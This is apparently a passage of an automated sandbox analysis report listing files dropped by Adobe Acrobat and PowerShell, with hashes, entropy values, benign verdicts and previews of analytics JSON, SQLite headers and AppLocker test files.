                                                                                                        Preview:{"analyticsData":{"responseGUID":"940d52b1-4d92-4100-9eae-98c6c6700101","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1728519701021,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"89628_277808ActionBlock_1","campaignId":89628,"containerId":"1","controlGroupId":"","treatmentId":"a8b11c37-7d39-4b12-9d33-a040ee4d296b","variationId":"277808"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IlNlbmQgZG9jdW1lbnRzICYgZm9ybXNcbmZvciBmYXN0IGUtc2lnbmluZyBvbmxpbmUuIn0sInRjYXRJZCI6IlJHUzAzNTEtRU5VLUNvbnRyb2wifQ==","dataType":"application
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):286
                                                                                                        Entropy (8bit):5.192432283306529
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:YEQXJ2HX6Q8kAEJK7+FIbRI6XVW7+0YGB69SKoAvJfshHHrPeUkwRe9:YvXKX6QNvEyYpW76CGUUUkee9
                                                                                                        MD5:E512C3DAF97C322E112E7C675B046DB6
                                                                                                        SHA1:B50FA8664B9C4BF5CF020CBF56BB4A395AC7A077
                                                                                                        SHA-256:58EC96F30578F8796F93514B8972152E311E00027E90084AD8B50CB3135A94E0
                                                                                                        SHA-512:3F7B10C553239AF63D400A527E366988C3BFD2731241F4E3DF6FABDD5CDE036B391501840EA61055C2D188162046D06AA2BA3919463E740F14ED81FD95875D01
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"940d52b1-4d92-4100-9eae-98c6c6700101","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1728519701021,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):782
                                                                                                        Entropy (8bit):5.348148089529907
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:YvXKX6QNvEyYpW76CGTq16Ukee1+3CEJ1KXd15kcyKMQo7P70c0WM6ZB/uhWA:Yv6XqXiV168CgEXX5kcIfANhd
                                                                                                        MD5:8F92FE96B1900D03D73D62930E069D74
                                                                                                        SHA1:307733976AC7AAA93C596639129F6429896354A4
                                                                                                        SHA-256:F701A6006B0C72F5BE5F7B7050915E6BC1BA5CCB9E868C6C7E10099D8E60A641
                                                                                                        SHA-512:538E8A2D588D9F8957DF5959111602797860DBD74CA584FBFA6731DC77C6845593E3176431E960D7D6CEF20A7AF1E727B70E6F2985FBF182F37D3259DA9B772D
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"940d52b1-4d92-4100-9eae-98c6c6700101","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1728519701021,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"Edit_InApp_Aug2020"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"20360_57769ActionBlock_0","campaignId":20360,"containerId":"1","controlGroupId":"","treatmentId":"3c07988a-9c54-409d-9d06-53885c9f21ec","variationId":"57769"},"containerId":1,"containerLabel":"JSON for switching in-app test","content":{"data":"eyJ1cHNlbGxleHBlcmltZW50Ijp7InRlc3RpZCI6IjEiLCJjb2hvcnQiOiJicm93c2VyIn19","dataType":"application\/json","encodingScheme":true},"endDTS":1735804679000,"startDTS":1728346511054}}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4
                                                                                                        Entropy (8bit):0.8112781244591328
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:e:e
                                                                                                        MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                                        SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                                        SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                                        SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                                        Malicious:false
                                                                                                        Preview:....
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2818
                                                                                                        Entropy (8bit):5.140836100560434
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:Y+D1iMZvWlWa1aytBvhCEBYK7QZ366t72N5fv2SPjtj0S4fDkkhC22RGV2LS45wt:YfMOD1hbBYK8Z36SaDBFQ05vRX9LhYt
                                                                                                        MD5:590F4ADC7BBC7D5675559DEBA31B914B
                                                                                                        SHA1:1DCC32D613F4D6EC7976A345A27CB8C2D76A9AC0
                                                                                                        SHA-256:9FB9C5EC2A24F12B132F3036AD1992AD8BBF88A8AC4F3ED27A8C6E47EE74AA54
                                                                                                        SHA-512:0C362E88438BF2785E58B6586543DEE31F80E62383D88E628149748DB50A9FD0D26D042ABB6EB313575DAC6930B4B10D0DEFC5F158D9A95D050AF1629158AB5E
                                                                                                        Malicious:false
                                                                                                        Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"62059e9721951ee909cae74e94a0a733","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1050,"ts":1728346510000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"d58d51bd115448474327b73ff0d97bc9","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1083,"ts":1728346510000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"7ab592dc1e91f779eafea3d729b619f3","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1082,"ts":1728346510000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"5ee0356386ce37c4fa1f82d658619697","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","size":1062,"ts":1728346510000},{"id":"Edit_InApp_Aug2020","info":{"dg":"52632c49038d97458c04c544e1412ed0","sid":"Edit_InApp_Aug2020"},"mimeType":"file","size":782,"ts":1728346510000},{"id":"DC_Reader_RHP_Banner","info":{"dg":"24288eb3178cf732c3d4a1e072feba24","sid":"DC_Reader_RHP_Banner"},"mimeType":"file","size":1395,"ts":1728346510000},{"id":"DC
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                                                                        Category:dropped
                                                                                                        Size (bytes):12288
                                                                                                        Entropy (8bit):0.998149586351382
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:TLKufx/XYKQvGJF7ursB1RZKHs/DNAGfpSAuV/eace3de3V/kfF:TGufl2GL7msvgONAGhSAuIaPEl/kt
                                                                                                        MD5:34DE4218E5AFD8F21372D99ADCE8551E
                                                                                                        SHA1:44F19F47F0475154E2AECF9A817219131F5839B1
                                                                                                        SHA-256:D5C7D14D6651E5CBD338223A6E4BA27EAF74E2415533E5FA6682F94491EB00BE
                                                                                                        SHA-512:9BDF26FA63F45E6ED51DC4774E0115593D9CBAABA0089692CA06C825AD0F6266345DD19A09122B610C2A0747D9E91E4E61A996B2B385A076745D785E32CBC63D
                                                                                                        Malicious:false
                                                                                                        Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:SQLite Rollback Journal
                                                                                                        Category:dropped
                                                                                                        Size (bytes):8720
                                                                                                        Entropy (8bit):1.3614228895632519
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:7+tW1RZKHs/Ds/SpafpSAuV/eace3de3V/kfQqLhx/XYKQvGJF7ursw:7MGgOVpahSAuIaPEl/koqFl2GL7msw
                                                                                                        MD5:C9867EEEC86DB1DCAE0B1D232C145399
                                                                                                        SHA1:E6DB8331BE1A08B14EF36CF6161E11A82ABFECF6
                                                                                                        SHA-256:FEBC644711B14BC35942161C69BF89105D21023CC067ABB3F9EF8FC198364948
                                                                                                        SHA-512:3A53FABA941860A51D417D397FECAEAE4B8DD95881778E93A998B811B34F712B4C19F8D9952B909D59BC8B9531B535565C73FF0D809C98CAA560BB6853066D66
                                                                                                        Malicious:false
                                                                                                        Preview:.... .c.....z*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j...#..#...z.>.....}.#.7.7........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):64
                                                                                                        Entropy (8bit):0.34726597513537405
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Nlll:Nll
                                                                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                        Malicious:false
                                                                                                        Preview:@...e...........................................................
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):246
                                                                                                        Entropy (8bit):3.4953527754662135
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8yQRkOnH:Qw946cPbiOxDlbYnuRKT1s
                                                                                                        MD5:02A44C3403EFCC98412C80918870CC49
                                                                                                        SHA1:3E83175757E37830879634B94BDBD404DEE926B7
                                                                                                        SHA-256:5F1556535A65AAE5FDFAC55D860262143EA4D192E91C626065F974CF5CA8C92E
                                                                                                        SHA-512:CEED697AD5E8C4956A53D79ED94B6942F8B9EE1E926987E04361E9C3A0500DD393D677E7157D3F255B8C8869526955121F34A3F550A8052B416B3CE37BF277A7
                                                                                                        Malicious:false
                                                                                                        Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .0.7./.1.0./.2.0.2.4. . .2.0.:.1.5.:.1.1. .=.=.=.....
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
